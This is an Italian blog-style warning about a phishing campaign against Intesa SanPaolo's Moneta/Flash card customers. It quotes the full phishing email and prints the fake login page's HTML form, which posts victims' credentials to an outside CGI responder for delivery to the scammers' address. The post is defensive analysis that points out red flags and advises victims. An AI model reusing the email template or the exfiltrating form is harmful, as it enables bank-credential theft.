[phishing] Moneta, password carta Flash

E' in corso un massiccio attacco phishing a danno dei servizi Moneta del gruppo Intesa SanPaolo. L'azione è veicolata tramite mail il cui contenuto è questo:

mittente: "Moneta Online"
oggetto: La password de la sua carta Flash
testo:
La password de la sua carta Flash e stata inserita piu di tre volte.
Per proteggere la sua carta abbiamo sospenso il acceso.
Per recuperare il acceso prego di entrare
[link al sito trappola]
e completare la pagina di attivazione.

Grazie ancora per aver scelto i servizi on-line di carta FLASH.
I migliori saluti.

Servizio Clienti IntesaSanPaolo

A prescindere dal fatto che il mittente di una email non è mai certo, si può notare come il dominio apparente non appartiene al registro italiano (.it) ma a quello lituano (.lt). Nel testo sono poi contenti una serie di errori grammaticali piuttosto grossolani che tradiscono immediatamente la natura truffaldina del messaggio.

Il link che ho rimosso conduce ad una pagine interna del sito rocstacommunity.com considerato a rischio da Netcraft. Qui viene riprodotta fedelmente la pagine di login del sito Intesa SanPaolo come evidente in questa immagine:
La mancata corrispondenza dell'indirizzo e il fatto che la connessione non sia sicura (https) dovrebbero essere ragioni sufficienti ad evitare qualsiasi altra operazione. Analizzando il codice della pagina si trova questo interessante blocco:

< method="post" action="http://www.iolfree.ie/cgi-bin/responder">
< type="hidden" name="_recipient" value="janinedouglas0@gmail.com">

Tradotto significa che i dati inseriti verranno gentilmente recapitati all'indirizzo janinedouglas0@gmail.com a disposizione degli autori della truffa. Per chi avesse commesso l'errore di inserire i propri dati nel form il consiglio banale è quello di bloccare immediatamente la carta chiamando il numero indicato qui.